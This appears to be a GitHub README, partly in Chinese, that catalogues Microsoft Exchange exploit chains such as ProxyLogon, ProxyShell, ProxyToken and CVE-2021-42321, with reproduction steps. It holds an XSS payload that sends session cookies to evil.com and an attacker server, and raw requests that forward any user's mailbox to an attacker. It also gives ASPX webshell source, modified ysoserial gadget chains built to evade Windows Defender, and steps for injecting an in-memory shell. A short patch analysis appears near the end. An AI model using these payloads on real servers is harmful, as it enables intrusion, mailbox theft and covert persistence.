Proxy-Attackchain
proxylogon & proxyshell & proxyoracle & proxytoken & all exchange server vulns summarization :)
- ProxyLogon: The most well-known and impactful Exchange exploit chain
- ProxyOracle: The attack which could recover any password in plaintext format of Exchange users
- ProxyShell: The exploit chain demonstrated at Pwn2Own 2021 to take over Exchange and earn $200,000 bounty
ProxyLogon is Just the Tip of the Iceberg: A New Attack Surface on Microsoft Exchange Server! Slides Video
| NAME | CVE | patch time | description | avaliable |
|---|---|---|---|---|
| CVE-2018-8581 | CVE-2018-8581 | yes | ||
| CVE-2018-8302 | CVE-2018-8302 | yes | ||
| CVE-2019-1040 | CVE-2019-1040 | yes | ||
| CVE-2020-0688 | CVE-2020-0688 | yes | ||
| CVE-2020-16875 | CVE-2020-16875 | yes | ||
| CVE-2020-17083 | CVE-2020-17083 | yes | ||
| CVE-2020-17143 | CVE-2020-17143 | yes | ||
| CVE-2020-17144 | CVE-2020-17144 | yes | ||
| ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | server-side request forgery (SSRF) | yes |
| ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | Microsoft.Exchange.Management.DDIService.WriteFileActivity未校验写文件后缀,可由文件内容部分可控的相关功能写入WebShell | yes |
| ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Reflected Cross-Site Scripting | yes |
| ProxyOracle | CVE-2021-31195 | May 11, 2021 | Padding Oracle Attack on Exchange Cookies Parsing | yes |
| ProxyShell | CVE-2021-34473 | Apr 13, 2021 | Pre-auth Path Confusion leads to ACL Bypass | yes |
| ProxyShell | CVE-2021-34523 | Apr 13, 2021 | Elevation of Privilege on Exchange PowerShell Backend | yes |
| ProxyShell | CVE-2021-31207 | May 11, 2021 | Post-auth Arbitrary-File-Write leads to RCE | yes |
| proxytoken | CVE-2021-33766 | July 13, 2021 | With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users. As an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker. | yes |
| Microsoft Exchange Server 远程执行代码漏洞 | CVE-2021-42321 | Nov 17, 2021 | Exchange Deserialization RCE | yes |
| ProxyRelay | CVE-2021-33768 | July 13, 2021 | Relay to Exchange FrontEnd | yes |
| ProxyRelay | CVE-2022-21979 | October 11, 2022 | Relay to Exchange BackEnd | yes |
| ProxyRelay | CVE-2021-26414 | June 8, 2021 | Relay to Exchange DCOM | yes |
| ProxyNotShell | yes | |||
| ProxyNotRelay | yes | |||
| OWASSRF(CVE-2022-41080) | CVE-2022-41080 | yes | ||
| TabShell(CVE-2022-41076) | CVE-2022-41076 | yes | ||
| CVE-2022-23277 | CVE-2022-23277 | yes | ||
| ProxyNotFound | CVE-2021-28480 | April 13, 2021 | Pre-auth SSRF/ACL bypass | no |
| ProxyNotFound | CVE-2021-28481 | April 13, 2021 | Pre-auth SSRF/ACL bypass | no |
ProxyLogon
ProxyLogon part links
ProxyOracle
ProxyOracle part links
Once a victim clicks this link, evil.com will receive the cookies.
https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//or use 3gstudent's way:
step1: XSS平台搭建
借助SSRF漏洞,控制Exchange服务器将Cookie信息发送至XSS平台,导致最终想要的Cookie信息位于Request Headers中
而现有的XSS平台大都是通过POST请求的参数来传递数据
为了解决这个问题,这里可以选择开源的XSS平台,地址如下:
https://github.com/3gstudent/pyXSSPlatform
只需要修改以下位置:
-
修改index.js,使用ajax模拟用户发包触发SSRF漏洞
-
修改 pyXSSPlatform.py ,将GET请求的Request Headers进行提取
-
使用合法的证书
index.js代码示例:
var xmlHttp = new XMLHttpRequest();
xmlhttp.open("GET", "https://192.168.1.1/owa/auth/x.js", false);
document.cookie = "X-AnonResource=true";
document.cookie = "X-AnonResource-Backend=OurXssServer.com/#~1";
xmlhttp.send();step2: XSS利用代码
控制用户访问XSS平台的代码示例:
https://192.168.1.1/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.head.appendChild(document.createElement(/script/.source)).src=/https:\/\/OurXssServer.com\/index.js/.source//step3: example cookie for decryption test:
cadata=FVtSAAWdOn29HYDQry+kG+994VUdAxONrayi4nbJW9JWTh8yLueD6IxYpahfxcGsA/B3FoVUQOD2EG605SR4QdeQ1pof+KD//6jwpmYQjv/II+OcqChrFZFvcMWv46a5; cadataTTL=eTxCEHKHDMmd/gEqDuOafg==; cadataKey=T4juhN4dUMKY4wkajUD43n4EWfMwefPQlqzxXmK4GnSHIZqo+g+uQg1Y2ogGoD1HyoVpRYgjGcCu6rmNQK+LsaZ8/lfBCThBI5yAhP1W2Fx+YNKvzy8Bcpui7zTlhAY598lE5Aijs6crHVXJeZkbLfMJgp0cFHj5uTQPcg31O/AeOAnD5c27IYOQ7JqMW7GOUVor1lhYnhh0R/NtWWqyfr5oE9j0jbxIGgrQrXIpLxL/uAU1ddC+/5jG9Edpq4sC213amuU/94rkHYzNH9OsiHYIkXr/NmkB7p908XrFrwXAcvV9QieoRiS3jvKCbzk3mnMu3YTnsJwAuiHzSXdCOQ==; cadataIV=GB9B+rwrigyPOf8xnV1KAek++yovEot9jFcV68WepCTQoRtQ5HUxSC7tE1mmHg0YtE6EOZNUM/WiNGP6xI4UTAofcMOfTLeRpBzeaKOETfjxKK2W7IKn+9k2tRkc1pIlO8FTOVx/dOHOoIFHUkqxFr+TgBULJ1I7tUmO7W0XDX4ZJHfmQhVqOOzeyjImKdX7Uv/jIJrF4VEew7rgvrC8BhqOqWgaTxpGhDTzIXl+wW3crsgZmXpXhOPURej1iwmtvhuQU6iuq4/IRv0lVIW3WvP6gUI8owIUxppnJl7YmN27Aqkjs0nTZZz1LBuZN+YxY4x6Lvs2FMG68jllhE4kwg==; cadataSig=BOJSYN2B+3RsXjO2akh3mqlKKkeAZVamOzfpVo0QdPEA3BHjpR6ls5yD9TzAQzRuWJJaaRIm7wMEiBMFz/sK5jk3R6kWw1OmMtJN2c38PdvwGIe6/7ByJdl52a5ojhDrRZhc4Qc3y+FFRx6XKvqUljTRWtHJGI1Jad2+LiNhJGkalhUeTM/a2V4LiQWf6Vv1KzJO79rZuOOOBnatht/E29j6636FpllCfEKrrogPQ7ADdVS6OOmqNU9gRMVgKnomC2t2PCtuYj26HUjnZ3rfc6BdzVmtu9EYSzccObsB2jxXXclAm5a+NZU/6sj9tlq3gcurjBl9yUDTgbZLg383gw==-
amd64 poc binary usage:
-
just a modyfied version of padre, added proxyoracle detect poc code...
-
-
python script exp usage:
Decrypt this cookie to plaintext:
ProxyShell
ProxyShell part links
- My Steps of Reproducing ProxyShell
- ProxyShell漏洞分析
- FROM PWN2OWN 2021: A NEW ATTACK SURFACE ON MICROSOFT EXCHANGE - PROXYSHELL!
- Reproducing The ProxyShell Pwn2Own Exploit
- ProxyShell
- A basic proxyshell scanner
- Generate proxyshell payload by Py Permutative Encoding
- CVE-2021-34473-Exchange-ProxyShell
- Exchange ProxyShell 远程代码执行漏洞复现
- exchange-proxyshell漏洞复现及分析
- Proof of Concept Exploit for Microsoft Exchange CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
short intro
- CVE-2021-34473 - Pre-auth Path Confusion
This faulty URL normalization lets us access an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and we could manipulate only the path part of the URL, it’s still powerful enough for us to conduct further attacks with arbitrary backend access.
https://xxx.xxx.xxx.xxx/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]- CVE-2021-34523 - Exchange PowerShell Backend Elevation-of-Privilege
- CVE-2021-31207 - Post-auth Arbitrary-File-Write
let's getting started and split proxyshell part to part ......
generate proxyshell specified webshell payload.
just put the webshell content you want to "webshell", then it will be fine...
then put the encoded webshell to <t:Content>...</t:Content> in chkproxyshell.go
confirm proxyshell and get the sid value to generate token.
use the following py script to gen token value
confirm the token is valid
now use the token to send a email with shell attachment in, this may be saved as a draft in test user's mailbox...
finnaly use the following wsman python script to export The draft to webshell, sometimes may write shell failed, try one more time will be fine :)
access the shell and then execute the commands you want:
view-source:https://192.168.186.130//aspnet_client/redhedh.aspx?cmd=Response.Write(Response.Write('eeeeeeeeeeeeeeeeeeee lUc1f3r11 is here!!!!'));shell is just work fine!!!
command exec:
view-source:https://192.168.186.130//aspnet_client/redhedh.aspx?cmd=Response.Write(new ActiveXObject("WScript.Shell").Exec("cmd.exe /c whoami /all").StdOut.ReadAll());
exploit proxyshell by using one click shell scripts from github
Pwn2Own 2021 Microsoft 3rd Exchange Exploit Chain (proxyshell but intresting exploit script)
links
ProxyToken
ProxyToken part links
- PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
- CVE-2021-33766-ProxyToken
- CVE-2021-33766
proxytoken复现
- Note: 此漏洞可被用来进行exchange邮箱窃取,钓鱼,社工角色伪装等,只需邮箱名无需任何密码即可利用
burpsuite请求包分析
- 第一步发送如下请求包查看proxytoken漏洞是否存在,其中[email protected]是攻击者想要读取邮件的那个邮箱地址
GET /ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
Host: 192.168.186.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: SecurityToken=x返回响应包页面状态为200,响应头中存在"msExchEcpCanary="及值,代表漏洞存在
- 第二步发送如下请求包,构造邮件转发规则到[email protected]邮箱,后续所有[email protected]发送给[email protected]邮箱的邮件,都会被重新转发一份给[email protected]邮箱,从而实现任意邮箱读取
POST /ecp/[email protected]/RulesEditor/InboxRules.svc/Newobject?msExchEcpCanary=FrgLJ_16A0Wr_5nhVivj6vBJGbdFFtsIzwQBoOvKIiUzB1yV5wMJqzG8oRfNd1HWUKm33fyrJ-I. HTTP/1.1
Host: 192.168.186.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: SecurityToken=x
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 327
{"properties":{"RedirectTo":[{"RawIdentity":"[email protected]","DisplayName":"[email protected]","Address":"[email protected]","AddressOrigin":0,"galContactGuid":null,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"[email protected]"}],"Name":"Testrule","StopProcessingRules":true}}返回响应包页面状态为200,响应内容如下,代表漏洞存在
{"d":{"__type":"RuleRowResults:ECP","Cmdlets":["New-InboxRule"],"ErrorRecords":[],"Informations":[],"IsDDIEnabled":false,"Warnings":[],"Output":null}}
golang proxytoken one click exploit
- proxytoken.go
- Use Options:
-te: is the email that you want to redirect to...
-ve: is the email that you want to attack and read the email ...
邮件转发规则修改结果
邮件发送测试,如下图,所有[email protected]发送给[email protected]邮箱的邮件,都会被重新转发一份给[email protected]邮箱
CVE-2018-8581
CVE-2018-8581 part links
CVE-2018-8302
CVE-2018-8302 part links
CVE-2019-1040
CVE-2019-1040 part links
- CVE-2019-1040 with Exchange
- Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin
- CVE-2019-1040-dcpwn
CVE-2020-16875
CVE-2020-16875 part links
CVE-2020-17083
CVE-2020-17083 part links
- Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability
- CVE-2020-17083 Microsoft Exchange Server任意代码执行漏洞 POC
CVE-2020-17143
CVE-2020-17143 part links
CVE-2020-0688
CVE-2020-0688 part links
CVE-2020-17144
CVE-2020-17144 part links
Exchange Authenticated RCE CVE-2021-42321
CVE-2021-42321 part links
- Get started with EWS client applications
- Phân tích bản vá tháng 11 của Microsoft Exchange
- CVE-2021-42321
- Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)
- DotNet安全-CVE-2021-42321漏洞复现
- Exchange漏洞系列分析二【Exchange 反序列化代码执行漏洞 (CVE-2021–42321)】
- Exchange 反序列化漏洞分析(一)
- vuln version & patched version go to How Tanium Can Help with the November 2021 Exchange Vulnerabilities (CVE-2021-42321)
- exch_CVE-2021-42321
- CVE-2021-42321-天府杯Exchange 反序列化漏洞分析
- CVE-2021-42321_poc.py
Exchange 2016 CU 21,22 and Exchange 2019 CU 10,11. This means the only recent latest version of Exchange 2016,2019 are vulnerable to this CVE
- Create UserConfiguration with BinaryData as our Gadget Chain
- Request to EWS for GetClientAccessToken to trigger the Deserialization
- vulnerable exchange versions
Exchange Server 2016 CU22 <= Oct21SU 15.1.2375.12 15.01.2375.012
Exchange Server 2016 CU21 <= Oct21SU 15.1.2308.15 15.01.2308.015
Exchange Server 2019 CU11 <= Oct21SU 15.2.986.9 15.02.0986.009
Exchange Server 2019 CU10 <= Oct21SU 15.2.922.14 15.02.0922.014直接修改ysoserial.net为写入aspx webshell
实际在利用的过程中遇到的500错误,原因是从ProxyLogon, ProxyShell开始,直到现在一些edr,AV,sysmon和Microsoft Windows Defender都试图捕获和阻止来自w3wp.exe进程的衍生进程。所以w3wp进程启动的进程被Definder拦截了。
这样的话只要修改ysoserial的代码功能为写文件即可利用,而不用启动其它进程。
修改后TypeConfuseDelegateGenerator
与原来的TypeConfuseDelegateGenerator-origin对比
TypeConfuse链改为写入文件,即可绕过 windows definder 的 w3wp.exe启动进程。
将此文件覆盖ysoserial.net原始文件,重新编译即可。然后运行如下命令生成gadget chain:
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o base64 -c "1" -t替换原poc中的gadget,即可成功写入webshell
修改了原poc,添加了写入如下两种shell的gadget chain:
- luci.aspx
a<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>- atobshell.aspx
a<%@ Page Language=\'JScript\' Debug=\'true\'%><%@Import Namespace=\'System.IO\'%><%File.WriteAllBytes(Request[\'b\'], Convert.FromBase64String(Request[\'a\']));%>运行脚本,成功写入两个webshell,方便后续各种操作
view-source:https://192.168.186.135/aspnet_client/luci.aspx?cmd=Response.Write(new ActiveXObject("WScript.Shell").Exec("cmd.exe /c whoami /all").StdOut.ReadAll());
添加植入内存马gadget chain
change DisableActivitySurrogateSelectorTypeCheck to True to overcome the limitation of .NET and later inject DLL to achieve mem-shell with Jscript to bypass the detection
.net mem-shell researchs resources
- 首先在注入memory shell之前,需要将DisableActivitySurrogateSelectorTypeCheck更改为True以绕开.NET的限制,这里使用ysoserial.net官方仓库的ClaimsPrincipal + ActivitySurrogateDisableTypeCheck相结合的gadget chain
Generate a minified BinaryFormatter payload to exploit Exchange CVE-2021-42321 using the ActivitySurrogateDisableTypeCheck gadget inside the ClaimsPrincipal gadget.
.\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c foobar -bgc ActivitySurrogateDisableTypeCheck --minify --ust将这个ClaimsPrincipal+ActivitySurrogateDisableTypeCheck反序列化链添加到CVE-2021-42321_shell_write_exp.py exp脚本中
将DisableActivitySurrogateSelectorTypeCheck更改为True以绕开.NET的限制后,使用弹计算器的TypeConfuseDelegate未修改版本gadget chain在目标上弹出计算器,以确认DisableActivitySurrogateSelectorTypeCheck成功更改为True
- origin TypeConfuseDelegate chain
.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o base64 -c "calc" -t
- 此处通过反序列化生成内存马的方式主要参考:
按照Memshell-HttpListener的github仓库中的说明编译内存马的.dll文件
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Web.dll,System.dll,Microsoft.CSharp.dll,System.Core.dll /t:library memshell.cs编译完之后会在目录下生成一个memshell.dll文件,将其改名为e.dll后续生成反序列化链需要用到
将e.dll文件复制到ysoserial.exe的bin目录中
现在生成加载e.dll,注入内存马的ClaimsPrincipal + ActivitySurrogateSelector结合的gadget chain
ActivitySurrogateSelectorGenerator.cs文件中加载e.dll的流程
及自带的Disable ActivitySurrogate type protections during generation功能
.\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c foobar -bgc ActivitySurrogateSelector --minify --ust将这个ClaimsPrincipal+ActivitySurrogateSelector反序列化链添加到CVE-2021-42321_shell_write_exp.py exp脚本中
-
-
-
本地测试最终exp
- exp运行前:
- 运行exp脚本,一键注入.net内存马
- 查看内存马命令执行效果
curl http://192.168.186.135/favicon.ico -H "Type: cmd" -d "pass=whoami"
note: 后续会另开一个github仓库深入分析.net内存马原理和实战利用方式
- asp.net无法getshell的一些解决办法
- 浅谈DotNET 内存马 Filter
- 浅谈 DotNet 内存马 Route
- 浅谈 DotNet 内存马 HttpListener
- ASP.NET下的内存马(1) filter内存马
- ASP.NET下的内存马(2) Route内存马
- ASP.NET下的内存马(3) HttpListener内存马
- ASP.NET下的内存马(4) VirtualPath内存马
- 渗透技巧——利用虚拟文件隐藏ASP.NET Webshell
- 从内存加载.NET程序集(Assembly.Load)的利用分析
- 从内存加载.NET程序集(execute-assembly)的利用分析
- 利用JS加载.Net程序
- 通过.NET实现内存加载PE文件
修复
KB5007409得到修复,最终反序列化的地方, 此处
this.formatter为IClientExtensionCollectionFormatter的实现,仅剩
Microsoft.Exchange.Data.ApplicationLogic.Extension.ClientExtensionCollectionFormatter.Deserialize(Stream):
Collection- TypeConfuseDelegate 链
(1). 初始化 Formatter 的 Binder 属性时,将一个恶意类置入了白名单,导致内置的黑名单过滤失效。
(2). ChainedSerializationBinder 黑名单中某个类拼写错误,导致内置的黑名单过滤失效。
ClientExtensionCollectionFormatter.Deserialize() 改为使用 ExchangeBinaryFormatterFactory.CreateBinaryFormatter() 创建 Formatter 再反序列化数据,并且其 allowedTypes 设为空,而不是直接使用 TypedBinaryFormatter,甚至直接删除了 TypedBinaryFormatter 类。
- ClaimsPrincipal 链
开发人员把类名写错,System.Security.ClaimsPrincipal 的正确写法应该是 System.Security.Claims.ClaimsPrincipal,直接改为正确的类名。
ProxyRelay
ProxyRelay part links
github的这个脚本报错,待后续深入研究relay attack后再来解决
[-] Authenticating against https://192.168.14.6 as EXCHANGE2016CU2/WIN-O3C32QA97FP$ FAILED
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Round 1 - Relay to Exchange FrontEnd
Round 2 - Relay to Exchange BackEnd
2-1 Attacking BackEnd /EWS
2-2 Attacking BackEnd /RPC
2-3 Attacking BackEnd /PowerShell
2-4 Patching BackEnd
Round 3 - Relay to Windows DCOM
Patching DCOM
ProxyNotShell
ProxyNotShell part links
- ProxyNotShell — the story of the claimed zero days in Microsoft Exchange
- ProxyNotShell: CVE-2022-41040 and CVE-2022-41082 Exploits Explained
- Microsoft Exchange ProxyNotShell vulnerability explained and how to mitigate it
- CONTROL YOUR TYPES OR GET PWNED: REMOTE CODE EXECUTION IN EXCHANGE POWERSHELL BACKEND
- Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
- ProxyNotShell-PoC
ProxyNotRelay
ProxyNotRelay part links
OWASSRF + TabShell
OWASSRF + TabShell part links
CVE-2022-23277
CVE-2022-23277 part links
认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。
- webshell:
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>- Bypassing .NET Serialization Binders
- dotnet反序列化之并不安全的SerializationBinder
- 2022 Exchange 再相遇之反序列化漏洞分析(二)
- Deep understand ASPX file handling and some related attack vectors
- The journey of exploiting a Sharepoint vulnerability.
Research white paper PDFs
- Friday the 13th JSON Attacks
- ProxyLogon is Just the Tip of the Iceberg
- Are you my Type? - Breaking .NET Through Serialization
- Pwn2Own 2021 Microsoft Exchange Exploit Chain 3rd Vulnerability doc
- 高级攻防演练下的Webshell
offline address book
- concept Email addresses and address books in Exchange Server
- Design
- [MS-OXOAB]: Offline Address Book (OAB) File Format and Schema
- [MS-OXWOAB]: Offline Address Book (OAB) Retrieval File Format
- [MS-OXPFOAB]: Offline Address Book (OAB) Public Folder Retrieval Protocol
Low Level API (RPC)
- All protocols
- A tool to abuse Exchange services
- Attacking MS Exchange Web Interfaces
- Exchange Server Protocol Documents
- Export items by using EWS in Exchange
- Autodiscover for Exchange
- [MS-OXCFXICS]: Bulk Data Transfer Protocol